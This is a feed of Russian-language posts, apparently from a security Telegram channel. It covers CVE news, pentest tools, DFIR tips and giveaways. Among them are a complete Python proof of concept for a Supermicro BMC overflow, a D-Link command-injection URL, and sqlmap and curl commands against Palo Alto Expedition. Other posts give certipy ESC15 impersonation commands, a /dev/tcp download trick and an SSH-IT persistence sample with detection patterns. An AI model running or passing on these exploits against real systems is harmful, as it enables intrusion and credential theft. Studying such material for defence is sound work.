SecuriXy.kz

Из разряда «А так можно было?»

Нет нужных сертификатов для соответствия квалификационным требованиям на тендер? – Не беда!

Зачем тратить деньги, время и усилия на повышение квалификации сотрудников, получая международно признанные сертификаты от аккредитованных организаций, если можно просто создать их самостоятельно в неограниченном количестве? 😆 😆

📜 Техники атак на ADCS в табличке

Ребята собрали все техники атак на Active Directory Certificate Services (ADCS) в одну табличку со сводной по тулам, которые могут проэксплуатировать и др.

🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0

Взято с канала APT

#ad #adcs #esc #cheatsheet

🛡️ Palo Alto PAN-OS Pre-Auth RCE Chain (CVE-2024-0012 & CVE-2024-9474)

A critical vulnerability chain in Palo Alto PAN-OS, combining an authentication bypass (CVE-2024-0012) and a command injection flaw (CVE-2024-9474) in the management web interface, allows unauthenticated attackers to execute arbitrary code with root privileges.

🛠 Affected Versions:
— PAN-OS 11.2 (up to and including 11.2.4-h1)
— PAN-OS 11.1 (up to and including 11.1.5-h1)
— PAN-OS 11.0 (up to and including 11.0.6-h1)
— PAN-OS 10.2 (up to and including 10.2.12-h2)

🔗 Research:
https://labs.watchtowr.com/pots-and-pans-ssl-vpn-palo-alto-pan-os-cve-2024-0012-cve-2024-9474/

🔗 PoC:
https://github.com/watchtowrlabs/palo-alto-panos-cve-2024-0012

🔗 Exploit:
https://github.com/Chocapikk/CVE-2024-9474

#paloalto #panos #sslvpn #unauth #rce

у CWL скидки от 55-80%

https://cyberwarfare.live/blackfriday/
#blackfriday

Когда решил узнать статус исправления уязвимостей

Весь год ждали скачух на сертификацию на черную пятницу, нате

https://github.com/0x90n/InfoSec-Black-Friday?tab=readme-ov-file#online-courses--training

#BlackFriday #Promo

Всем привет!

С каждым днем лица людей на улице все более сердитые и угрюмые, кое-где успел выпасть снег, а некогда теплые осенние вечера сменились тоскливыми снежными сумерками.

В такое время очень не хватает хорошего списка LPE эксплойтов под винду.

К великому сожалению, я не смог обнаружить актуальный поддерживаемый список сплойтов 2023-2024 годов, впрочем, благодаря каналу 1N73LL1G3NC3, который был предательски снесен администрацией Telegram, у меня получалось достаточно оперативно пополнять свой небольшой лист с гитхабовскими POC.

Поэтому я принял решение о создании своего списка с LPE сплойтами под винду. Получилось собрать практически все POCи, которые выходили с 2023 года.

Ознакомиться можно тут:
https://github.com/MzHmO/Exploit-Street

🚨 Fortinet FortiManager Unauthenticated RCE (CVE-2024-47575)

The remote code execution vulnerability in FortiManager allows attackers to perform arbitrary operations by exploiting commands via the FGFM protocol, circumventing authentication. Referred to as FortiJump, this vulnerability provides unauthorized access to FortiManager, enabling control over FortiGate devices by taking advantage of insufficient security in command handling and device registration processes.

🛠 Affected Versions:

FortiManager 7.6.0
FortiManager 7.4.0 through 7.4.4
FortiManager 7.2.0 through 7.2.7
FortiManager 7.0.0 through 7.0.12
FortiManager 6.4.0 through 6.4.14
FortiManager 6.2.0 through 6.2.12
FortiManager Cloud 7.4.1 through 7.4.4
FortiManager Cloud 7.2.1 through 7.2.7
FortiManager Cloud 7.0.1 through 7.0.12
FortiManager Cloud 6.4

🔗 Research:
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/

🔗 Source:
https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

#fortinet #fortimanager #fgfm #unauth #rce

Давно искал тулину по тесту почтовых серверов - #MailSecOps

Установка:

git clone https://github.com/0xhav0c/MailSecOps.git; cd MailSecOps; 
pip install -r requirements.txt

Использование:

python3 MailSecOps.py

https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/

Citrix Virtual Apps and Desktops (XEN)
*
Unauthenticated Remote Code execution
*
exploit

🚨 Масштабная утечка данных через уязвимость MOVEit 🚨

Хакер под псевдонимом Nam3L3ss опубликовал данные, полученные через критическую уязвимость в ПО MOVEit, что привело к утечке информации о сотрудниках более 25 крупных компаний, включая Amazon, McDonald’s, HSBC и HP.

Ключевые факты:
Уязвимость: CVE-2023-34362 в MOVEit позволила злоумышленникам обходить аутентификацию и получать доступ к конфиденциальным данным.

Объем утечки: Данные включают имена, адреса электронной почты, номера телефонов и организационные структуры сотрудников.

Пострадавшие компании:
• Amazon — 2 861 111 записей
• HSBC — 280 693 записей
• HP — 104 119 записей
• McDonald’s — 3 295 записей
• И многие другие

Рекомендации:
Эта утечка подчеркивает необходимость своевременного обновления программного обеспечения и усиления мер кибербезопасности.

Источник: InfoStealers

Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак.

LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.

>exec 3<>/dev/tcp/<kali-ip>/22

>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: <kali-ip>\r\nConnection: close\r\n\r\n" >&3

>cat <&3 > linpeas.sh

#linux #lol #upload #tips

SSH-IT. Инструкция по обнаружению популярного инструмента 🔭

В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы иногда обнаруживаем на них различные хакерские инструменты.

Сегодня поговорим об SSH-IT. Хакеры часто используют его для перехвата SSH-сессий и получения вводимых пользователем команд.

Для обнаружения признаков установки инструмента на узлах ищите:

1. Файлы по паттерну: '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)':

find / -type f | egrep -a '/prng/((askpass|hook|x|ssh_login)\.sh|depth\.cfg|funcs|ptyspy_bin\.[a-z_0-9]+\-(linux|alpine|osx)|seed|ssh|thc_cli)'

🧐 Пример:

/home/john/.config/prng/askpass.sh
/home/john/.config/prng/depth.cfg
/home/john/.config/prng/funcs
/home/john/.config/prng/hook.sh
/home/john/.config/prng/ptyspy_bin.aarch64-linux
/home/john/.config/prng/ptyspy_bin.armv6l-linux
/home/john/.config/prng/ptyspy_bin.i386-alpine
/home/john/.config/prng/ptyspy_bin.mips32-alpine
/home/john/.config/prng/ptyspy_bin.mips64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-alpine
/home/john/.config/prng/ptyspy_bin.x86_64-osx
/home/john/.config/prng/seed
/home/john/.config/prng/ssh
/home/john/.config/prng/ssh_login.sh
/home/john/.config/prng/thc_cli
/home/john/.config/prng/x.sh

2. Файлы, через которые может осуществляться закрепление в системе и в которых встречаются строки по паттерну: '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD'

egrep -aor '# DO NOT REMOVE THIS LINE\. SEED PRNGD|source.+2\>/dev/null #PRNGD' /

👀 Пример (файл /home/john/.profile):

"# ~/.profile: executed by the command interpreter for login shells.
# DO NOT REMOVE THIS LINE. SEED PRNGD.
source "$(echo 2f686f6d652f6a6f686e2f2e636f6e6669672f70726e672f736565640a|/usr/bin/xxd -r -ps 2>/dev/null)" 2>/dev/null #PRNGD
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022

# if running bash
if [ -n ""$BASH_VERSION"" ]; then
    # include .bashrc if it exists
    if [ -f ""$HOME/.bashrc"" ]; then
        . ""$HOME/.bashrc""
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/bin"" ] ; then
    PATH=""$HOME/bin:$PATH""
fi

# set PATH so it includes user's private bin if it exists
if [ -d ""$HOME/.local/bin"" ] ; then
    PATH=""$HOME/.local/bin:$PATH""
fi"

📃 Рекомендации по дальнейшим действиям:

1️⃣ Заблокировать адреса управляющих серверов;

2️⃣ Удалить файлы, относящиеся к SSH-IT, а также изменить файлы, через которые SSH-IT закрепился в системе;

3️⃣ Перезагрузить скомпрометированный хост;

4️⃣ Осуществить поиск подозрительных входов по сети и проверку логов веб-сервера (если он есть и торчит наружу).

#tip #detect #hacktool #dfir
@ptescalator

🔥 Критическая уязвимость в D-Link хранилках 🔥

🚨 CVE-2024-10914 — Обнаружена уязвимость в моделях D-Link DNS-320, DNS-320LW, DNS-325 и DNS-340L (версии до 28 октября 2024 года), позволяющая удалённым злоумышленникам выполнять произвольные команды.

🔴 Детали: Уязвимость связана с недостаточной проверкой параметра name в функции cgi_user_add файла /cgi-bin/account_mgr.cgi?cmd=cgi_user_add, что может привести к выполнению произвольных команд на устройстве.

💡 Рекомендации: D-Link не планирует выпускать обновления для этих моделей, так как они достигли конца жизненного цикла. Рекомендуется заменить устройства на поддерживаемые модели или, как временное решение, ограничить доступ к ним из внешних сетей.

🔗 PoC GitHub

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27

Автоматизация для ленивых багхантеров или One-Liner для автоматизации сбора и разбора URL-адресов при тестировании на SQL-инъекции по доменному имени:

waybackurls <DOMAIN> | grep '='| httpx --silent --status-code| awk '{print $1}'| xargs -I{} sqlmap -u {} -v 3 --random-agent --tamper "between,randomcase,space2comment" --level 5 --risk 3 --batch --threads 5 --crawl 2 --suffix=') and 1=1-- -'

#SQLi #waybackurls #sqlmap

Новый троянец SteelFox (WinRing, xmrig) крадет конфиденциальные данные и криптовалюту

https://securelist.ru/steelfox-trojan-drops-stealer-and-miner/110964/

🔥Microsoft Windows Server 2025 начал продавливаться апдейтами для обновления🔥

🚀 Дата выпуска: 4 ноября 2024 года

Ключевые особенности:
• Улучшенная безопасность: Новые функции Active Directory и поддержка SMB over QUIC обеспечивают защиту от современных угроз (SMB -> HTTPS TLS 1.3).
• Гибридные возможности: Интеграция с Azure Arc упрощает управление гибридными и мультиоблачными средами.
• Производительность и масштабируемость: Поддержка GPU-партиционирования и улучшенная работа с NVMe-накопителями повышают эффективность работы.

Сначала хотел сказать, что ничего революционного нас не ждёт, но функция «hot patching» позволяющая значительно сократить количество перезагрузок после обновлений. А также значительное увеличение производительности базы данных AD с переходом на многопоточность, это действительно революционные изменения в мире серверных ОС от Microsoft.

Подробнее: Блог Windows Server

🩸 Критическая уязвимость RCE в FortiManager 🩸

🚨 #CVE-2024-47575 — Уязвимость удалённого выполнения кода (RCE) в FortiManager, позволяющая неаутентифицированному злоумышленнику выполнять произвольные команды через специально сформированные запросы (также известна как FortiJump).

🔴 Уязвимые версии:
• FortiManager 7.6.0
• FortiManager 7.4.0 - 7.4.4
• FortiManager 7.2.0 - 7.2.7
• FortiManager 7.0.0 - 7.0.12
• FortiManager 6.4.0 - 6.4.14
• FortiManager 6.2.0 - 6.2.12
• FortiManager Cloud: Версии от 6.4.1 до 7.4.4

💡 Детали: PoC продают за 147$, в гитхабе куча селлеров.

🔗 Подробнее от Fortinet
🔗 Аналитика от Mandiant

🔥 Уязвимость обхода аутентификации в Apache Solr 🔥

🚨 CVE-2024-45216 — В Apache Solr с плагином PKIAuthenticationPlugin (включён по умолчанию при активации аутентификации) обнаружена уязвимость обхода аутентификации. Добавление поддельного окончания к любому URL API Solr позволяет обойти проверку!

🔴 Уязвимые версии:
• Solr 5.3.0 до 8.11.3
• Solr 9.0.0 до 9.6.9

💡 Решение: Обновите Solr до версий 9.7.0 или 8.11.4, чтобы защитить систему. Поторопитесь с установкой патча! 🔒

🔗 Подробнее NVD
🔗 Подробнее Разбор
🔗 Шаблон Nuclei

🚀 Обновление Evil-WinRM до версии 3.7 🚀

Кто использует, но давно не обновлялся - #evil-winrm, один из ключевых инструментов для взаимодействия с PowerShell на Windows, добавила новые возможности и улучшения!

PS gem install evil-winrm - обновляет только до 3.5

🔥Основные изменения с версии 3.5 до 3.7:

🆕 Версия 3.7:

• 🛡️ Исправлена команда меню для предотвращения обнаружения как вредоносного ПО.
• 🔀 Улучшено обход EDR, добавлена рандомизация названий функций и переменных PowerShell.
• 📊 Добавлен индикатор выполнения для обхода AMSI.

🆕 Версия 3.6:
• 🔍 Улучшен парсинг путей и исправлена ошибка при загрузке файлов без расширения.
• 🛠️ Заменена устаревшая функция File.exists на File.exist для совместимости с новыми версиями Ruby.
• 🧑‍💻 Добавлен параметр user-agent (благодарим @gmkbenjamin).
• 🛡️ Обновлен обход AMSI и добавлен обход ETW.
• 🐛 Исправлена функция Donut-Loader.

📥 Как обновить до последней версии (v3.7):

gem uninstall evil-winrm       # Удалить старую версию
gem install evil-winrm         # Установить последнюю версию
rbenv rehash                   # Обновить кэш rbenv
evil-winrm --version           # Проверить текущую версию (должно показать v3.7)

🔗 Подробнее: evil-winrm на GitHub

🗣Внимание, конкурс!

Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от The Linux Foundation. Ваучеры дают 100% скидку до 31.10.2025 — и мы хотим ими поделиться:

🟣 Каталог электронных курсов и сертификации

Их можно применить к любому:

— онлайн-курсу
— сертификационному экзамену
— или пакету (курс + сертификация)

🤝 CKA, CKS, CKAD и другие — в комплекте!

Условия розыгрыша просты: 🔵 Подпишитесь на KazDevOps и нажмите "участвую" под этим постом.

🚩 14 ноября подведем итоги и выберем 7 победителей. Каждый получит по ваучеру. Активировать ваучеры нужно до 31.10.2025. После этого у вас будет 1 год и 2 попытки, чтобы завершить обучение и/или сдать экзамен.

Go-go-go, и успехов!

#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf

@DevOpsKaz 😛

Быстрый поиск RDP по аутлуку
*
Распространенная практика рассылать креды\ssh\rdp\etc в рамках корпоративной почты
*

\\Content\.Outlook\\[A-Z0-9]{8}\\[^\\]{1,255}\.rdp$

или

\AppData\Local\Microsoft\Windows\
\Content.Outlook\
.rdp

Своеобразный опыт получили с этим розыгрышем 🙀

За пару дней прыгнули с честных 4к до накрученных 10.1к по количеству подписчиков 📈🔝

Желая подарить звёзды единомышленникам, раздали их случайным людям 🤷‍♂
А по нашим наблюдениям, из 50 победителей, только ~7 являются нашей ЦА (судя по их участию в тематических чатах ИБ)

На будущее будем лучше обдумывать стратегию поощрения и благодарности своих подписчиков, а не рандомных пользователей телеги.

Всем привет)
Хотим поздравить вас с праздниками,
С днём республики,
С международным днём шампанского,
И всемирным днём лемура! 😁

А ещё, мы тут не заметили, что вас уже 4000+ 💃

И в честь этого события мы разыграем между 50 случайными подписчиками по 100 телеграм звёзд 🌟
Розыгрыш пройдет автоматически, 27 октября в 7 вечера по Алмате

Спасибо что остаётесь с нами ☺️

Занятная книженция «ChatGPT for Cybersecurity - Cookbook»

CVE-2024-46538
*
PfSense Stored XSS lead to RCE
*
POC exploit

Хакеры заявили о взломе крупнейшей американской компании, специализирующейся на производстве сетевого оборудования.

— Среди скомпрометированных данных: проекты GitHub и GitLab, учетные записи и сертификаты безопасности, клиентские токены API, контейнеры AWS и SSL-сертификаты, а также сборки Docker и контейнеры Azure.

https://t.me/BleepingComputer/20855

https://t.me/BleepingComputer/20880

https://sec.cloudapps.cisco.com/security/center/resources/october_15_2024

#cisco #databreach #breach #циско

Критическая уязвимость #CVE-2024-21216 в Oracle #WebLogic Server - Позволяет неаутентифицированному злоумышленнику, имеющему доступ к сети через T3 и IIOP привести к полному захвату сервера.

CVSS 3.1 Score: 9.8
Уязвимы версии: с 12.2.1.4.0 по 14.1.1.0.0

https://github.com/advisories/GHSA-r389-865g-hcg3

💻 Exploiting Windows Kernel via Kernel Streaming Proxying

An in-depth look at CVE-2024-30090, a vulnerability in Kernel Streaming, allowing privilege escalation via malformed IOCTL requests. By leveraging KS Event mishandling during 32-bit to 64-bit conversions, can exploit the bug pattern to gain arbitrary kernel mode access.

🔗 Research:
Proxying to Kernel - Part I
Proxying to Kernel - Part II

🔗 Source:
https://github.com/Dor00tkit/CVE-2024-30090

#windows #streaming #kernel #cve #poc

Всем привет. Собрал для вас материалы c тематических Adversary Village, Bug Bounty Village и AppSec Village последнего DEFCON.

🥷🏼 Adversary Village

Master Splinter’s initial physical access dojo - Storytelling of a complex adversarial
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Tough Adversary - Don’t Blame Sun Tzu
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Kubernetes Attack Simulation - The Definitive Guide
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Exploiting Voice Cloning in Adversarial Simulation
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

MFT - Malicious Fungible Tokens
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Evading Modern Defenses When Phishing with Pixels
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Sneaky Extensions - The MV3 Escape Artists
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Responding to Breaches, Ransomware, and State - Sponsored Threat Actors
🎬 Видео на YouTube
💾 Видео MP4


💰 Bug Bounty Village

Blaklis - From Easy Wins to Epic Challenges
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Leveraging AI for Smarter Bug Bounties
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Efficient Bug Bounty Automation Techniques
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Hunters and Gatherers - A Deep Dive into the World of Bug Bounties
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Top War Stories from a TryHard Bug Bounty Hunter
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Reflections on a Decade in Bug Bounties - Experiences and Major Takeaways
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка

Practical Exploitation of DoS in Bug Bounty
🎬 Видео на YouTube
💾 Видео MP4
💾 Презенташка


⚙️ AppSec Village

Maturing Your Application Security Program
🎬 Видео на YouTube

Navigating the Cyber Security Labyrinth Choose Your Own Security Adventure
🎬 Видео на YouTube

Gridlock The Dual Edged Sword of EV and Solar APIs in Grid Security
🎬 Видео на YouTube

The Missing Link How we collect and leverage SBOMs
🎬 Видео на YouTube

BOLABuster-Harnessing LLMs for Automating BOLA Detection
🎬 Видео на YouTube

0.0.0.0 Day Exploiting Localhost APIs From The Browser
🎬 Видео на YouTube

Ticking SQLi
🎬 Видео на YouTube

Transforming AppSec Protecting 'Everything as Code'
🎬 Видео на YouTube

The Immortal Retrofuturism of Mainframes and How to Keep Them Safe
🎬 Видео на YouTube

The Darkest Side of Bug Bounty (jhaddix)
🎬 Видео на YouTube

Speed Bumps and Speed HacksP: Adventures in Car Mfg Security
🎬 Видео на YouTube

Securing Frontends at Scale: Paving our Way to Post XSS World
🎬 Видео на YouTube

Defeating Secure Code Review GPT Hallucinations
🎬 Видео на YouTube

Relative Path File Injection The Next Evolution in RPO
🎬 Видео на YouTube

Your CI CD Pipeline Is Vulnerable, But It's Not Your Fault
🎬 Видео на YouTube

AppSec Considerations From the Casino Industry
🎬 Видео на YouTube

Lessons Learned from Building and Defending LLM Applications
🎬 Видео на YouTube

Web2 Meets Web3 Hacking Decentralized Applications
🎬 Видео на YouTube

Using EPSS for Better Management Vulnerability Management
🎬 Видео на YouTube

Hacking Corporate Banking for Fun and Profit
🎬 Видео на YouTube

Fine Grained Authorisation with Relationship Based Access Control
🎬 Видео на YouTube

Got 99 problems but prompt injection ain't watermelon
🎬 Видео на YouTube


🔗 Скачать бесплатно, без СМС и регистрации:
Все материалы Villages ~ 6.3 GiB
Плейлист на YouTube с AppSec Village

Инструмент для анализа изменений файлов и создания временной шкалы на Linux-системах.

Для вывода отчёта в
HTML:

python3 timeline_graph.py  -start-date 14.10.2024 -end-date 15.10.2024 -html -f timeline_report.html  -hash md5

CSV:

python3 timeline_graph.py -start-date 14.10.2024 -end-date 15.10.2024 -csv -f timeline_report.csv -hash md5

С графом запускать так:

python3 timeline_graph.py -start-date 14.10.2024 -end-date 15.10.2024 -u USERNAME -html -f timeline_report.html -hash md5 -graph

https://github.com/cleverg0d/Forensics/tree/main/Linux_Forensics

Спасибо Jaroslav Shmelev за идею. Чутка улучшил добавив многопоточность (ThreadPoolExecutor) и вывод HTML-отчета c таймлайном и в CSV и фильтрацию артефактов и всякие фильтрафии по датам и имени юзера и тп.

#Forensics #Linux #TimeLine

Exploit for Windows Kernel-Mode Driver Elevation of Privilege Flaw (CVE-2024-35250)

Microsoft-Analyzer-Suite (Community Edition)

A collection of PowerShell scripts for analyzing data from Microsoft 365 and Microsoft Entra ID.

https://github.com/evild3ad/Microsoft-Analyzer-Suite

#Velociraptor быстро стал одним из моих любимых инструментов для расследований #DFIR.
Новая функция таймлайна (#timeline), доступная в версии 0.73 - это шедевр!

https://docs.velociraptor.app/blog/2024/2024-09-12-timelines/

Timelinize

Я уже много раз говорил, что люблю метод разложения на таймлайне, как один из самых наглядных в процессе расследований. И похоже у нас появился претендент на мега-инструмент для этого (правда в очень ранней стадии разработки).
Timelinize позволяет разложить на временную шкалу любые типы данных. В ручном, полуавтоматическом или полностью в автоматическом режиме. Просто сущности, посты в социальных сетях, комментарии, геокоординаты, файлы и т.д.

Работает пока нестабильно, но потенциал виден уже сейчас-огромный!

Всех с пятницей,

Для тех, кто увлекается прохождением машин и заданий (CTF) на платформе HTB (Hack The Box) мы создали русскоязычный чат с каналом для того, чтобы Вы общались, делились опытом с коллегами со всего СНГ и лампово проводили время за решением задачек.

https://t.me/+58bkJZ8q0IQzZTMy

#HTB #HackTheBox #HTBrus #HTBcommunity #CTF

Класический #grep оказывается справляется не очень, когда дело идет о больших данных.

Советуем использовать #ripgrep
Nix

sudo apt install ripgrep

MacOS

brew install ripgrep

Пример поиска паролей, IP и емейлов в исходниках с исключением файлов изображений:

rg -i --glob '!*.{png,jpg,jpeg,gif,svg,bmp,webp}' '(password|passwd|pwd|pass)\s*=\s*["'"'"'][^"'"'"']+["'"'"']|\b(\d{1,3}\.){3}\d{1,3}\b|[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' .

#tips #bash #terminal

Представьте себе на минутку, что Вы крутили скулю (#SQLi) долго и не простую, а какой-нибудь Boolean-based Blind, байпася при этом ваф уже 2-3 суток дампите таблицы и колонки посимвольно и тут бац и обрывчики... Боль? не то слово!

Так вот, обработать руками сессионный session.sqlite крайне не простая задача, но скульмап (#sqlmap) это за нас придумал очень давно. Я действительно не знал но оч помогло. Просто добавьте вконце Вашего запроса

-s session.sqlite --offline

и вся сессия превратиться в красивый и удобно читаемый CSV.

https://github.com/sqlmapproject/sqlmap/issues/4127

"Полупальто" их бин больной совсем или Palo Alto из N-Day до полной компроментации

[**CVE-2024-9465: Palo Alto Expedition Unauthenticated SQL Injection**](https://github.com/horizon3ai/CVE-2024-9465)

Скульмапом тащим таблицу юзеров:

python3 sqlmap.py -u "https://10.0.40.64/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump

CVE-2024-5910: Отсутствие аутентификации приводит к захвату учетной записи администратора злоумышленниками, имеющими доступ к сети

curl -k 'https://10.0.40.64/0S/startup/restore/restoreAdmin.php'

[**CVE-2024-9464: Palo Alto Expedition Authenticated Command Injection Exploit**](https://github.com/horizon3ai/CVE-2024-9464)

CVE-2024-9466: Cleartext Credentials in Logs

/home/userSpace/devices/debug.txt

Сервер Expedition хранит только API-ключи и не должен сохранять учетные данные в открытом виде, но в этом файле журнала были показаны все учетные данные, использованные в открытом виде. Об этой проблеме было сообщено, и ей присвоен номер CVE-2024-9466.

Blog: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/

Shodan dork:

html:"Expedition Project"

Source: https://t.me/P0x3k/1966

В certipy завезли новый вектор атаки #ESC15 на центр сертификации ADCS, которая использует специфические настройки шаблонов сертификатов, которые соответствуют большинству первичных условий атаки ESC1 или на ESC3, а именно:

1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты.
2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей.
3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости.

Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников.

Примеры:
1. Запрос сертификата с указанием ‘Client Authentication’ EKU:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u '[email protected]' -p 'Password1' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'

2. Запрос сертификата с указанием OID для ‘Client Authentication’:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u '[email protected]' -p 'Password1' -template "WebServer" -upn "[email protected]" --application-policies '1.3.6.1.5.5.7.3.2'

-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных.
-> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым.

https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47

Ретрансляция Kerberos. Хаброразбор.

После пучины долгих раздумий и определенных сложностей с новым инструментом для редактирования текстов на хабр, я хочу представить вам статью про релей кербероса. Если вы до сих пор откладывали эту интереснейшую тему для изучения, то пора взять себя в руки и погрузиться в глубины кербероса, DCOMа и релеев!

Вчера вышел еще один POC на Kerberos Relay — KrbRelay-SMBServer. Этот инструмент также не остался без внимания и я не забыл упомянуть его в статье.

Читать тут:

https://habr.com/ru/articles/848542/

Сканер уязвимостей Nuclei умеет и в Azure
https://blog.projectdiscovery.io/azure-config-review-with-nuclei/

и в AWS
https://blog.projectdiscovery.io/aws-cloud-security-config-review-using-nuclei-templates/

(Config Review) оказывается...
#nuclei #aws #azure

🛠 Всем привет. Я тут допилил тулу для рекона на основе информации из Azure (без аутентификации).

Смысл в том, чтобы доставать из ажура домены и инфу по тенанту (например какой у таргета SSO).

Давно хотел сделать такой аналог AADInternals, но без смс, регистрации, пауэршелла, дополнительных зависимостей. Только статический бинарник, только хардкор.

Тула поддерживает STDIN/STDOUT, поэтому можно использовать ее в пайплайнах с другими вещами, например от ProjectDiscovery.

Выглядит это безобразие так:

📖 Установка:

go install -v github.com/haxxm0nkey/azhunt@latest

или через репу

git clone https://github.com/haxxm0nkey/azhunt.git
cd azhunt
go build
mv azhunt /usr/local/bin/
azhunt 

⚙️ Режимы работы:

Базовый режим - тащит и инфу по тенанту и домены.

azhunt -d microsoft.com

Режим для интеграции с другими тулами (-silent)

azhunt -d microsoft.com -silent

Есть вывод в JSON, в файл, чтение доменов из файла.

🔗 Где исходники, Билли?
https://github.com/haxxm0nkey/azhunt

Хорошей пятницы вам!

📖 Тем временем в NetExec (nxc) подвезли поддержку протокола NFS.
Из функций сейчас доступен энум файловых шар (права и файлы рекурсивно), погрузка и разгрузка файлов.


Базовый энум

NetExec nfs IP --shares

Рекурсивный энум

NetExec nfs IP --enum-shares

Забираем файл

NetExec nfs IP --get-file /home/user/Desktop/test/lolkekpohek.txt lolkekpohek.txt

Заливаем файл

NetExec nfs IP --put-file lolkekpohek.txt /home/user/Desktop/

🔗 Где почитать подробнее:
Энум
https://www.netexec.wiki/nfs-protocol/enumeration

Льем/качаем файлы
https://www.netexec.wiki/nfs-protocol/download-and-upload-files

Исходники
https://github.com/Pennyw0rth/NetExec/tree/main/nxc/protocols/nfs

Мы знаем как админы не любят менять заводские пароли к админкам сереров типа iDrac, iLO и др. И вот вишинка #CVE-2024-36435
с CVSS 9.8 в прошивке BMC компании Supermicro в некоторых материнских платах X11, X12, H12, B12, X13, H13 и B13 (и модулях CMM6).

Неавторизованный пользователь может отправить в интерфейс поддельные данные, которые вызывают переполнение буфера стека и могут привести к произвольному RCE а на BMC.

https://www.binarly.io/blog/cve-2024-36435-deep-dive-the-years-most-critical-bmc-security-flaw

PoC:

# CVE-2024-36435 – Buffer overflow vulnerability in Supermicro BMC IPMI firmware due to unchecked length of user-supplied value

import base64
import requests

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# set target and command values
target = "https://192.168.10.53:443/cgi/login.cgi"
command = "touch /tmp/BRLY"

libc_base = 0x76283000  # we try to guess
gadget_1_offset = 0x000D8874  # pop {r0, r1, r2, r3, fp, pc};
gadget_2_offset = 0x001026D4  # mov r0, sp; blx r3;
system_offset = 0x0003C4D4

print(f"Target: {target}")
print(f"Command: {command}")
print()
print(f"libc_base: {libc_base:#x}")
print(f"gadget_1_offset: {gadget_1_offset:#x}")
print(f"gadget_2_offset: {gadget_2_offset:#x}")
print(f"system_offset: {system_offset:#x}")
print()


payload = base64.b64encode(
    b"\x00" * 456
    + int.to_bytes(libc_base + gadget_1_offset, 4, "little")  # gadget_1
    + b"\x00" * 12
    + int.to_bytes(libc_base + system_offset, 4, "little")  # system
    + b"\x00" * 4
    + int.to_bytes(libc_base + gadget_2_offset, 4, "little")  # gadget_2
    + command.encode()
).decode()

data = f"name={payload}&pwd=&check=1"

print("Sending requests...")
i = 0
while True:
    print(f"Request: '{i}'")
    r = requests.post(target, data=data, verify=False)
    i += 1